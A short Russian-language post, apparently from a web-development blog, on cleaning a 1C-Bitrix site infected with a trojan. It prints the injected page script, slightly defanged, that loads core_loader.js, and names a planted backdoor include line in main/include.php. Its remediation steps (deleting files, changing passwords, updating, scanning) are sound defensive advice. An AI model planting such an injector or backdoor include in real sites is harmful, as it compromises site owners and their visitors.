Сайты и софт
/bitrix/js/main/core/core_loader.js встраивается в код страницы
Перед закрывающим бади система вставляет скрипт:
<sc ript type="text/javascript" defer>var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.32';scriqt.onl oad=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt);</sc ript>
<sc ript type="text/javascript" defer>var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.32';scriqt.onl oad=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt);</sc ript>
На него ругается валидатор, антивирусники — все ругаются.
Что делать? Есть 5 простых правил.
Что делать? Есть 5 простых правил.
-
Проверяем, есть ли файл /restore.php в корне сайта. Если есть — удаляем.
-
Удаляем файлы:
/bitrix/js/main/core/core_loader.js
/bitrix/js/main/core/core_tasker.js
/bitrix/tools/check_files.php
- Редактируем /bitrix/modules/main/include.php, удалив из него строчку:
require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");
или на нее похожую
- Удаляем /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php
- Меняем пассворды в админку.
- Меняем пассворды к ftp на хостинге, а лучше вообще прибить все ftp и особенно ssh акаунты.
- Не сохраняем пароли в браузере
- После этого крайне рекомендуется обновить свою установку через систему обновлений! Затем выполнить поиск троянов, используя модуль: marketplace.1c-bitrix.ru/solutions/bitrix.xscan/